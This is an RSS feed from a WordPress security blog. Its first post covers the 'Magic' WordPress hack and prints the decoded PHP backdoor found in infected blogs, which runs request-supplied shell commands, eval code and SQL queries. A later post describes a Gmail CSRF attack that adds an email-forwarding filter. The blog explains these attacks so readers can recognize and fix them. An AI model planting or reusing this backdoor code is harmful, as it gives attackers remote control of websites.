<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>security blog &#187; blogging/blog hack</title>
	<atom:link href="http://elamb.org/category/bloggingblog-hack/feed/" rel="self" type="application/rss+xml" />
	<link>http://elamb.org</link>
	<description>don&#039;t be sheeple</description>
	<lastBuildDate>Mon, 22 Feb 2010 08:45:44 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.3</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Server at Magic Requires Username Password</title>
		<link>http://elamb.org/server-magic-requires-username-password/</link>
		<comments>http://elamb.org/server-magic-requires-username-password/#comments</comments>
		<pubDate>Sat, 08 Aug 2009 05:32:08 +0000</pubDate>
		<dc:creator>elamb.security</dc:creator>
		<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/elamb_security/elamb.org/wp-content/plugins/autometa/autometa.php</b> on line <b>300</b><br />
		<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[I got hacked]]></category>
		<category><![CDATA[Internet and Information Technology Security]]></category>
		<category><![CDATA[Main Digg]]></category>
		<category><![CDATA[blogging/blog hack]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[information assurance]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[blog hacks]]></category>
		<category><![CDATA[magic]]></category>
		<category><![CDATA[magic server]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[wordpress hack]]></category>

	<!-- AutoMeta Start -->
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/?p=1839</guid>
		<description><![CDATA[The Wordpress &#8220;Magic&#8221; hack! 
If your getting this message: &#8220;The server (our server domain, e.g. DOMAIN.COM) at Magic&#8221; Then you likely have infected code in your wordpress blog. 
Wordpress user Yokima reported this very slick hack.
FIX ACTION:
And the fix is to update your blog.  This will fix the issue.  Make sure you change [...]]]></description>
			<content:encoded><![CDATA[<p>The Wordpress &#8220;Magic&#8221; hack! </p>
<p><strong>If your getting this message</strong>: <em>&#8220;The server (our server domain, e.g. DOMAIN.COM) at Magic&#8221; Then you likely have infected code in your wordpress blog. </em></p>
<div id="attachment_1840" class="wp-caption alignnone" style="width: 310px"><a href="http://elamb.org/wp-content/uploads/2009/08/wordpress-server-magic-requires-graphitti-copy.jpg"><img src="http://elamb.org/wp-content/uploads/2009/08/wordpress-server-magic-requires-graphitti-copy-300x252.jpg" alt="Wordpress Magic Attack" title="Wordpress Server Magic Requires Graphitti" width="300" height="252" class="size-medium wp-image-1840" /></a><p class="wp-caption-text">Wordpress Magic Attack</p></div> 
<p>Wordpress user <a href="http://wordpress.org/support/profile/11490">Yokima</a> <a href="http://wordpress.org/support/topic/295482">reported this very slick hack</a>.</p>
<p><strong>FIX ACTION</strong>:<br />
And the fix is to update your blog.  This will fix the issue.  Make sure you change your password if you actually put your information in that &#8220;serve at Magic&#8221; message box.  Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code.  Doing further research on this matter.</p>
<p><em>*Similar issues reported by <a href="http://wordpress.org/support/profile/1874238">techartist</a> &#8220;<a href="http://wordpress.org/support/topic/247792">server BLAH.fuzz.com at Fuzz Access requires a username and password</a>.&#8221;<br />
</em><br />
<a href="http://www.flickr.com/photos/yonghokim/3777646797/sizes/o/">What the infected code looks like after the malware injection into your blog.. yep.. uuugly!</a></p>
<p><strong>From <a href="http://wordpress.org/support/profile/1485130">RocketWood</a>:<br />
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:</strong></p>
<p><code>{</p>
<p>if (!function_exists('______safeshell'))</p>
<p>{</p>
<p>function ______safeshell($komut) {</p>
<p>@ini_restore("safe_mode");</p>
<p>@ini_restore("open_basedir");</p>
<p>$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));</p>
<p>if (!empty ($komut)) {</p>
<p>if (function_exists('passthru') &#038;&#038; !in_array('passthru', $disable_functions)) {</p>
<p>//@ ob_start();</p>
<p>@ passthru($komut);</p>
<p>//$res = @ ob_get_contents();</p>
<p>//@ ob_end_clean();</p>
<p>}</p>
<p>elseif (function_exists('system') &#038;&#038; !in_array('system', $disable_functions)) {</p>
<p>//@ ob_start();</p>
<p>@ system($komut);</p>
<p>//$res = @ ob_get_contents();</p>
<p>//@ ob_end_clean();</p>
<p>}</p>
<p>elseif (function_exists('shell_exec') &#038;&#038; !in_array('shell_exec', $disable_functions)) {</p>
<p>$res = @ shell_exec($komut);</p>
<p>echo $res;</p>
<p>}</p>
<p>elseif (function_exists('exec') &#038;&#038; !in_array('exec', $disable_functions)) {</p>
<p>@ exec($komut, $res);</p>
<p>$res = join("\n", $res);</p>
<p>echo $res, "\n";</p>
<p>}</p>
<p>elseif (@ is_resource($f = @ popen($komut, "r"))) {</p>
<p>//$res = "";</p>
<p>while (!@ feof($f)) {</p>
<p>//$res .= @ fread($f, 1024);</p>
<p>echo(@ fread($f, 1024));</p>
<p>}</p>
<p>@ pclose($f);</p>
<p>}</p>
<p>else</p>
<p>{</p>
<p>$res = {$komut};</p>
<p>echo $res;</p>
<p>}</p>
<p>}</p>
<p>}</p>
<p>};</p>
<p>if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {</p>
<p>echo "
<php_bdb7e9f039f4c7d9100073e131610a87_result>\n";</p>
<p>if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {</p>
<p>eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);</p>
<p>}</p>
<p>else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {</p>
<p>______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);</p>
<p>}</p>
<p>else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {</p>
<p>$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);</p>
<p>if (!$result)</p>
<p>{</p>
<p>echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";</p>
<p>die();</p>
<p>}</p>
<p>else if (is_resource($result))</p>
<p>{</p>
<p>$res = array();</p>
<p>while ($row = mysql_fetch_assoc($result))</p>
<p>{</p>
<p>$res[] = $row;</p>
<p>};</p>
<p>mysql_free_result($result);</p>
<p>echo serialize($res);</p>
<p>die();</p>
<p>}</p>
<p>else</p>
<p>{</p>
<p>echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";</p>
<p>die();</p>
<p>}</p>
<p>};</p>
<p>echo "\n</php_bdb7e9f039f4c7d9100073e131610a87_result>\n";</p>
<p>die();</p>
<p>};</p>
<p>};</code></p>
<p>p.s: don&#8217;t feel too bad, even the <a href="http://www.root777.com/do-no-evil/dan-kaminsky-gets-hacked/">security masters</a> get hacked by malicious S.O.B&#8217;s.</p>
<img src="http://elamb.org/?ak_action=api_record_view&id=1839&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/server-magic-requires-username-password/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Unable to create directory-parent directory writable? wordpress 2.7</title>
		<link>http://elamb.org/unable-to-create-directory-parent-directory-writeable/</link>
		<comments>http://elamb.org/unable-to-create-directory-parent-directory-writeable/#comments</comments>
		<pubDate>Sun, 28 Jun 2009 15:33:18 +0000</pubDate>
		<dc:creator>elamb.security</dc:creator>
		<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/elamb_security/elamb.org/wp-content/plugins/autometa/autometa.php</b> on line <b>300</b><br />
		<category><![CDATA[Main Digg]]></category>
		<category><![CDATA[Other Stuff]]></category>
		<category><![CDATA[blogging/blog hack]]></category>
		<category><![CDATA[blogging/blog howto]]></category>
		<category><![CDATA[blogging/blogging tricks]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[tutorials]]></category>
		<category><![CDATA[wordpress]]></category>

	<!-- AutoMeta Start -->
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/?p=1740</guid>
		<description><![CDATA[I was having uploading images on one of my Wordpress 2.7 &#038; 2.8 blogs.  It gave me the following error:
Unable to create directory /home/username/server/wp-content/uploads/20XX/MM/   Is it parent directory writable by the server?
After a long time searching I found this solution from http://www.cyriac.me
Step 1: Log into your admin panel
Step 2: Go to Settings>>Miscellaneous
You [...]]]></description>
			<content:encoded><![CDATA[<p>I was having uploading images on one of my Wordpress 2.7 &#038; 2.8 blogs.  It gave me the following error:<br />
Unable to create directory /home/username/server/wp-content/uploads/20XX/MM/   Is it parent directory writable by the server?</p>
<p>After a long time searching I found this <a href="http://www.cyriac.me/how-to-solve-image-upload-error-in-wordpress-27/">solution from http://www.cyriac.me</a></p>
<blockquote><p>Step 1: Log into your admin panel</p>
<p>Step 2: Go to Settings>>Miscellaneous</p>
<p>You will see two options,</p>
<p>Store uploads in this folder<br />
Full URL path to files<br />
Most probably you will see</p>
<p>/home/.boogee/XXXXX/XXXXXXX/wp-content/uploads</p>
<p>in the first field.</p>
<p>Step 3: Edit that to just</p>
<p>wp-contents/uploads</p></blockquote>
<p>Some people were suggesting that you solve the problem my making the folders permissions 777, meaning anyone can do anything to that particular folder.  As a security guy, I knew this was a bad idea (and it also did work for me <img src='http://elamb.org/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ).  I kept searching and ran into that solution.</p>
<p>Worked like a charm!  thanks cyriac for putting solution on the blog.</p>
<img src="http://elamb.org/?ak_action=api_record_view&id=1740&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/unable-to-create-directory-parent-directory-writeable/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>More GMAIL Problems</title>
		<link>http://elamb.org/more-gmail-problems/</link>
		<comments>http://elamb.org/more-gmail-problems/#comments</comments>
		<pubDate>Sat, 22 Nov 2008 19:03:59 +0000</pubDate>
		<dc:creator>elamb.security</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Domain Names]]></category>
		<category><![CDATA[Google Hacks]]></category>
		<category><![CDATA[I got hacked]]></category>
		<category><![CDATA[Internet and Information Technology Security]]></category>
		<category><![CDATA[Main Digg]]></category>
		<category><![CDATA[Security Awareness]]></category>
		<category><![CDATA[Security Awareness/ISSA]]></category>
		<category><![CDATA[Security Management]]></category>
		<category><![CDATA[blogging/blog hack]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[cracker]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[scam]]></category>

	<!-- AutoMeta Start -->
	<category>makeuseof</category>
	<category>gmail</category>
	<category>temporary</category>
	<category>domain</category>
	<category>managed</category>
	<category>domains</category>
	<category>makeusof</category>
	<category>flaw</category>
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/more-gmail-problems/</guid>
		<description><![CDATA[This was news I could not ignore because I really, really like Gmail.  These hacks are ridiculous.  I hope that google is getting a handle on this.  It looks like the accounts are getting hacked with some sort of script that runs from a site or email while gmail is opened:  [...]]]></description>
			<content:encoded><![CDATA[<p>This was news I could not ignore because I really, really like Gmail.  These hacks are ridiculous.  I hope that google is getting a handle on this.  It looks like the accounts are getting hacked with some sort of script that runs from a site or email while gmail is opened:  </p>
<p><strong>According to David Airey &#038; gnucitizen.org:</strong><br />
The victim visits a page while being logged into GMail. Upon execution, the page performs a multipart/form-data POST to one of the GMail interfaces and injects a filter into the victim’s filter list. In the example above, the attacker writes a filter, which simply looks for emails with attachments and forward them to an email of their choice. This filter will automatically transfer all emails matching the rule. Keep in mind that future emails will be forwarded as well. The attack will remain present for as long as the victim has the filter within their filter list, even if the initial vulnerability, which was the cause of the injection, is fixed by Google.<br />
&#8211; <a href="http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/">gnucitizen</a></p>
<p>As many of you already know on November 2nd, MakeUseOf.com’s domain was stolen from us. It took us about 36 hours to get the domain back. As we have pointed out earlier the hacker somehow managed to get access to my Gmail account and from there to our GoDaddy account, unlock the domain and move it to another registrar.</p>
<p>You can see the whole story on our temporary blog <a href="http://makeuseof-temporary.blogspot.com/">makeuseof-temporary.blogspot.com/</a></p>
<p>I wasn’t planning to publish anything about the incident or cracker (person who steals domains) and how he managed to pull it off unless I was completely sure about it myself. I had a good feeling it was a Gmail security flaw but wanted to confirm it before posting anything about it on MakeUseOf. We love Gmail and giving them bad publicity is not something we would ever want to do.</p>
<p>Now the thing is the domain name domainsgames.org is protected by Moniker and they hide all the contact info for it.</p>
<p>    Domain ID:D154519952-LROR<br />
    Domain Name:DOMAINSGAME.ORG<br />
    Created On:22-Oct-2008 07:35:56 UTC<br />
    Last Updated On:08-Nov-2008 12:11:53 UTC<br />
    Expiration Date:22-Oct-2009 07:35:56 UTC<br />
    Sponsoring Registrar:Moniker Online Services Inc. (R145-LROR)<br />
    Status:CLIENT DELETE PROHIBITED<br />
    Status:CLIENT TRANSFER PROHIBITED<br />
    Status:CLIENT UPDATE PROHIBITED<br />
    Status:TRANSFER PROHIBITED<br />
    Registrant ID:MONIKER1571241<br />
    .<br />
    .<br />
    .<br />
    .<br />
    Name Server:NS3.DOMAINSERVICE.COM<br />
    Name Server:NS2.DOMAINSERVICE.COM<br />
    Name Server:NS1.DOMAINSERVICE.COM<br />
    Name Server:NS4.DOMAINSERVICE.COM</p>
<p>More at <a href="http://www.makeuseof.com/tag/breaking-gmail-security-flaw-more-domains-get-stollen/">Makeusof.com</a> </p>
<p><a href="http://www.gnucitizen.org/blog/csrf-demystified/?_method=POST&#038;_enctype=multipart/form-data&#038;_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&#038;cf2_emc=true&#038;cf2_email=evilinboxmailinator.com&#038;cf1_from&#038;cf1_to&#038;cf1_subj&#038;cf1_has&#038;cf1_hasnot&#038;cf1_attach=true&#038;tfi&#038;s=z&#038;irf=on&#038;nvp_bu_cftb=Create%20Filter">The Google Fix</a></p>
<img src="http://elamb.org/?ak_action=api_record_view&id=1609&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/more-gmail-problems/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ahmadinejad&#8217;s blog hacked and defaced</title>
		<link>http://elamb.org/ahmadinejads-blog-hacked-and-defaced/</link>
		<comments>http://elamb.org/ahmadinejads-blog-hacked-and-defaced/#comments</comments>
		<pubDate>Wed, 24 Jan 2007 15:33:14 +0000</pubDate>
		<dc:creator>elamb</dc:creator>
				<category><![CDATA[I got hacked]]></category>
		<category><![CDATA[Main Digg]]></category>
		<category><![CDATA[blogging/blog hack]]></category>

	<!-- AutoMeta Start -->
	<category></category>
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/ahmadinejads-blog-hacked-and-defaced/</guid>
		<description><![CDATA[&#8220;Iranian President Mahmoud Ahmadinejad&#8217;s Blog we dealt with last week&#8221;
Ahmadinejad has a blog?!  I wonder who else within the &#8220;axis of evil&#8221; has blogs.  Chavez?  Kim Jong Il? 
read more &#124; digg story
]]></description>
			<content:encoded><![CDATA[<p>&#8220;Iranian President Mahmoud Ahmadinejad&#8217;s Blog we dealt with last week&#8221;</p>
<p>Ahmadinejad has a blog?!  I wonder who else within the &#8220;axis of evil&#8221; has blogs.  Chavez?  Kim Jong Il? </p>
<p><a href="http://www.zone-h.org/content/view/14106/30/">read more</a> | <a href="http://digg.com/politics/Ahmadinejad_s_blog_hacked_and_defaced">digg story</a></p>
<img src="http://elamb.org/?ak_action=api_record_view&id=863&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/ahmadinejads-blog-hacked-and-defaced/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Analyzing 20,000 MySpace Passwords</title>
		<link>http://elamb.org/analyzing-20000-myspace-passwords/</link>
		<comments>http://elamb.org/analyzing-20000-myspace-passwords/#comments</comments>
		<pubDate>Mon, 18 Sep 2006 15:09:15 +0000</pubDate>
		<dc:creator>elamb</dc:creator>
				<category><![CDATA[Main Digg]]></category>
		<category><![CDATA[blogging/blog hack]]></category>

	<!-- AutoMeta Start -->
	<category></category>
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/analyzing-20000-myspace-passwords/</guid>
		<description><![CDATA[In a day where browsers are coming out with anti-phising tactics, I can not believe how many people still fall for phising. It&#8217;s all over the news, and most email clients display warnings. So when I got an email from &#8220;Admin@MySpace.com&#8221; I kind of chuckled.
I have a friend who is constantly getting her MySpace account [...]]]></description>
			<content:encoded><![CDATA[<p>In a day where browsers are coming out with anti-phising tactics, I can not believe how many people still fall for phising. It&#8217;s all over the news, and most email clients display warnings. So when I got an email from &#8220;Admin@MySpace.com&#8221; I kind of chuckled.</p>
<p>I have a friend who is constantly getting her MySpace account hacked.  There seem to be lots of security issues in MySpace.</p>
<p><a href="http://cyber-knowledge.net/blog/2006/09/16/analyzing-20000-myspace-passwords/">read more</a> | <a href="http://digg.com/security/Analyzing_20_000_MySpace_Passwords">digg story</a></p>
<img src="http://elamb.org/?ak_action=api_record_view&id=698&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/analyzing-20000-myspace-passwords/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Why Subdomain Hosting is Bad</title>
		<link>http://elamb.org/why-subdomain-hosting-is-bad/</link>
		<comments>http://elamb.org/why-subdomain-hosting-is-bad/#comments</comments>
		<pubDate>Thu, 20 Jul 2006 21:27:28 +0000</pubDate>
		<dc:creator>elamb</dc:creator>
		<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/elamb_security/elamb.org/wp-content/plugins/autometa/autometa.php</b> on line <b>300</b><br />
		<category><![CDATA[Main Digg]]></category>
		<category><![CDATA[blogging]]></category>
		<category><![CDATA[blogging/blog hack]]></category>
		<category><![CDATA[blogging/blog howto]]></category>

	<!-- AutoMeta Start -->
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/why-subdomain-hosting-is-bad/</guid>
		<description><![CDATA[&#8220;A quick look at why offering non-reseller subdomain hosting is a bad idea and can expose your passwords to malicious hostees.&#8221;
I&#8217;m glad I stubbled across this. I was going to host on Wordpress Mu, but now I think I&#8217;ll stick with Blogware until I can lock down WPMU. Wordpress is a superior product (more intuitive, [...]]]></description>
			<content:encoded><![CDATA[<p>&#8220;A quick look at why offering non-reseller subdomain hosting is a bad idea and can expose your passwords to malicious hostees.&#8221;</p>
<p>I&#8217;m glad I stubbled across this. I was going to host on Wordpress Mu, but now I think I&#8217;ll stick with Blogware until I can lock down WPMU. Wordpress is a superior product (more intuitive, better SEO design ect) But WPMU is just too new. I don&#8217;t feel comfortable having a buch of customers on such a shake, new system. I will likely host my own set of blogs on it until all the major bugs are worked out.</p>
<p><a href="http://www.jemjabella.co.uk/post.php?title=20060720_why_subdomain_hosting_is_bad">read more</a> | <a href="http://digg.com/security/Why_Subdomain_Hosting_is_Bad">digg story</a></p>
<img src="http://elamb.org/?ak_action=api_record_view&id=657&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/why-subdomain-hosting-is-bad/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Dvorak&#039;s Blog Spam Fix</title>
		<link>http://elamb.org/dvoraks-blog-spam-fix/</link>
		<comments>http://elamb.org/dvoraks-blog-spam-fix/#comments</comments>
		<pubDate>Tue, 27 Sep 2005 03:11:07 +0000</pubDate>
		<dc:creator>elamb.security</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[I got hacked]]></category>
		<category><![CDATA[Internet and Information Technology Security]]></category>
		<category><![CDATA[Kill Spammers]]></category>
		<category><![CDATA[blogging]]></category>
		<category><![CDATA[blogging/blog hack]]></category>
		<category><![CDATA[blogging/blog howto]]></category>
		<category><![CDATA[blogging/blogging tricks]]></category>
		<category><![CDATA[security]]></category>

	<!-- AutoMeta Start -->
	<category></category>
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/?p=224</guid>
		<description><![CDATA[Dvorak gets no spam, now he gets no blog spam.&#160; 
But my spam problems have just begun:I started getting nailed with casino, porn and commercial site spam.&#160; They trackback promoting Disney Trips, penis enlargements or, my favorite, Texas Holdem.&#160; I still get a few spam links about every few weeks or so.&#160; And I&#39;m currently [...]]]></description>
			<content:encoded><![CDATA[<p>Dvorak gets no spam, now he gets no blog spam.&nbsp; </p>
<p>But my spam problems have just begun:<br />I started getting nailed with casino, porn and commercial site spam.&nbsp; They trackback promoting Disney Trips, penis enlargements or, my favorite, Texas Holdem.&nbsp; I still get a few spam links about every few weeks or so.&nbsp; And I&#39;m currently getting and giving traffic to a casino site.. and I haven&#39;t figured out how that is happening.&nbsp; I&#39;m&nbsp;sure these bastards are usings some&nbsp;kind of software to locate vulnerable (anonymous accepting) blogs and nuke them.&nbsp; I&#39;ve had to terminate my anonymous comments and I&#39;m thinking of shutting down my Trackbacks.&nbsp; I also blocked a few repeat offenders.&nbsp; For me, that is unfortunate because the interaction (free comments, links to and from relevant sites of many different oppinions) is the coolest thing about blogs.&nbsp; Blog innocence has come and gone over night.</p>
<p>Appearently, Marc Perkel at <a href="http://www.ctyme.com/">ctyme.com</a> has found a way to get rid of all spam providing you are using apache and on word press.</p>
<p>He does it with this code:</p>
<p>&lt; location /blog/wp-comments-newpost.php &gt;<br />RewriteEngine On<br />RewriteCond %{HTTP_REFERER} !^.*dvorak.org/.*<br />RewriteRule ^.* http://www.ctyme.com/comment-spam.html<br />&lt; /location &gt;</p>
<p><a href="http://www.dvorak.org/blog/?p=2904">read more</a>&nbsp;|&nbsp;<a href="http://digg.com/programming/Dvorak_s_Blog_Spam_Fix">digg story</a></p>
<img src="http://elamb.org/?ak_action=api_record_view&id=224&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/dvoraks-blog-spam-fix/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Comment Spammers Exploiting Open blogs</title>
		<link>http://elamb.org/comment-spammers-exploiting-open-blogs/</link>
		<comments>http://elamb.org/comment-spammers-exploiting-open-blogs/#comments</comments>
		<pubDate>Tue, 16 Aug 2005 10:53:31 +0000</pubDate>
		<dc:creator>elamb.security</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Computer Security/Home Computer Security]]></category>
		<category><![CDATA[Computer Security/Home Computer Security/Home Computer ]]></category>
		<category><![CDATA[I got hacked]]></category>
		<category><![CDATA[Kill Spammers]]></category>
		<category><![CDATA[blogging]]></category>
		<category><![CDATA[blogging/blog hack]]></category>
		<category><![CDATA[blogging/blogging tricks]]></category>
		<category><![CDATA[blogging/blogharbor]]></category>
		<category><![CDATA[blogging/blogharbor/blogware]]></category>
		<category><![CDATA[blogging/moveabletype]]></category>
		<category><![CDATA[blogging/typepad]]></category>
		<category><![CDATA[security]]></category>

	<!-- AutoMeta Start -->
	<category></category>
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/?p=158</guid>
		<description><![CDATA[
I&#39;ve recently experienced an increase in spam traffic on my blog.
It started when I got about 20 comments in one day on one of my least
popular articles.&#160; I could see that the porn spammer had dug deep
into my site and found a seemingly insignifigant article to place about
100 links.&#160; I deleted them imediately and blocked [...]]]></description>
			<content:encoded><![CDATA[<p>
I&#39;ve recently experienced an increase in spam traffic on my blog.<br />
It started when I got about 20 comments in one day on one of my least<br />
popular articles.&nbsp; I could see that the porn spammer had dug deep<br />
into my site and found a seemingly insignifigant article to place about<br />
100 links.&nbsp; I deleted them imediately and blocked the IP from<br />
whince they came.&nbsp; </p>
<p>The very next day I had fifteen more.&nbsp; I delete those and blocked<br />
that IP.&nbsp; I&#39;ve been forced to turn off my anonymous<br />
comments.&nbsp; One of my favorite things about blogs is that anyone<br />
can say anything &#8211; they so refreshingly interactive that they create<br />
these close relationships with readers.&nbsp; </p>
<p>Unfortunately, casino, porn and pill spammers also see the power of<br />
blogs.&nbsp; They target blogs with anonymous comments and<br />
trackbacks.&nbsp; And they use thousands of hacked computers to act as<br />
proxies so that even if you block their IP they&#39;ve got plenty more ways<br />
to get to you.&nbsp; </p>
<p>I&#39;ve blocked them and I&#39;m still seeing traffic coming from their sites<br />
which tells me that they have linked to my site and my visitors are<br />
clicking into their site then coming back to me.&nbsp; </p>
<p>Here is a list of Casino Spammers retreived from <a href="http://netaloid.com/index.php/archives/2005/02/24/casino-spam-part-ii-voiding-an-agreement/">Netaloid.com</a> </p>
<p><b>&#8220;Finding our Poker Spammer&#8217;s identifying links is easy.</b> Just<br />
visit one of his web pages by using one of the thousands of spam links<br />
he left on your site. Like poker.terashells.com, for instance. Then<br />
click on the links to the casino sites. You&#8217;ll see something like (or<br />
identical to) this:&#8221;</p>
<p>http://www.pacificpoker.com/default.htm?sr=904970&amp;flag=0002</p>
<p>http://www.partypoker.com/index20100.htm?wm=2445773</p>
<p>http://www.empirepoker.com/index.htm?wm=2170658</p>
<p>http://banner.casinolasvegas.com/cgi-bin/redir.cgi?id=N&amp;member=onlinecas&amp;profile=lv2m</p>
<p>http://www.888.com/default.htm?sr=611794&amp;flag=0002</p>
<p>http://www.starluckcasino.com/slcasino/links/56296.html</p>
<p>http://www.aceclub.com/aceclub/links/1790.html</p>
<p>http://www.reefclubcasino.com/default.htm?sr=806320&amp;flag=0002</p>
<p>
For more on legally stopping Casino, Porn and other spammers visit: </p>
<p>http://www.thepetitionsite.com/takeaction/353566831?ltl=1124161500</p>
<p>http://www.theregister.co.uk/2005/01/31/link_spamer_interview/</p>
<img src="http://elamb.org/?ak_action=api_record_view&id=158&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/comment-spammers-exploiting-open-blogs/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Google Hacking Explained</title>
		<link>http://elamb.org/google-hacking-explained/</link>
		<comments>http://elamb.org/google-hacking-explained/#comments</comments>
		<pubDate>Tue, 19 Jul 2005 19:47:31 +0000</pubDate>
		<dc:creator>elamb.security</dc:creator>
		<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/elamb_security/elamb.org/wp-content/plugins/autometa/autometa.php</b> on line <b>300</b><br />
		<category><![CDATA[Google Hacks]]></category>
		<category><![CDATA[Howto]]></category>
		<category><![CDATA[Internet and Information Technology Security]]></category>
		<category><![CDATA[blogging/blog hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[tutorials]]></category>
		<category><![CDATA[tutorials/tools]]></category>

	<!-- AutoMeta Start -->
	<!-- AutoMeta End -->
	
		<guid isPermaLink="false">http://elamb.org/?p=107</guid>
		<description><![CDATA[What is Google hacking? How is Google used by hackers as a tool? Read this article for more information. 
Johny Long, author of the official Google Hacking book will be at the Las Vegas, NV Defcon 13 Convention signing books.&#160; 
read more&#160;&#124;&#160;digg story
]]></description>
			<content:encoded><![CDATA[<p>What is Google hacking? How is Google used by hackers as a tool? Read this article for more information. </p>
<p>Johny Long, author of the official Google Hacking book will be at the Las Vegas, NV Defcon 13 Convention signing books.&nbsp; </p>
<p><a href="http://jollyblog.squarespace.com/recent1/2005/7/11/google-hacking-explained.html">read more</a>&nbsp;|&nbsp;<a href="http://digg.com/security/Google_Hacking_Explained">digg story</a></p>
<img src="http://elamb.org/?ak_action=api_record_view&id=107&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://elamb.org/google-hacking-explained/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Absolutely Del.icio.us &#8211; Complete Tool Collection</title>
		<link>http://elamb.org/absolutely-delicious-complete-tool-collection/</link>
		<comments>http://elamb.org/absolutely-delicious-complete-tool-collection/#comments</comments>
		<pubDate>Tue, 28 Jun 2005 04:11:50 +0000</pubDate>
		<dc:creator>elamb.security</dc:creator>
		<br />
<b>Warning</b>:  Invalid argument supplied for foreach() in <b>/home/elamb_security/elamb.org/wp-content/plugins/autometa/autometa.php</b> on line <b>300</b><br />
		<category><![CDATA[Howto]]></category>
		<category><![CDATA[blogging]]></category>
		<category><![CDATA[blogging/RSS]]></category>
		<category><![CDATA[blogging/blog hack]]></category>
		<category><![CDATA[blogging/blog howto]]></category>
		<category><![CDATA[blogging/blogging tricks]]></category>
		<category><![CDATA[blogging/blogharbor]]></category>
		<category><![CDATA[blogging/blogharbor/blogware]]></category>
		<category><![CDATA[blogging/moveabletype]]></category>
		<category><![CDATA[blogging/typepad]]></category>
		<category><![CDATA[delicious]]></category>
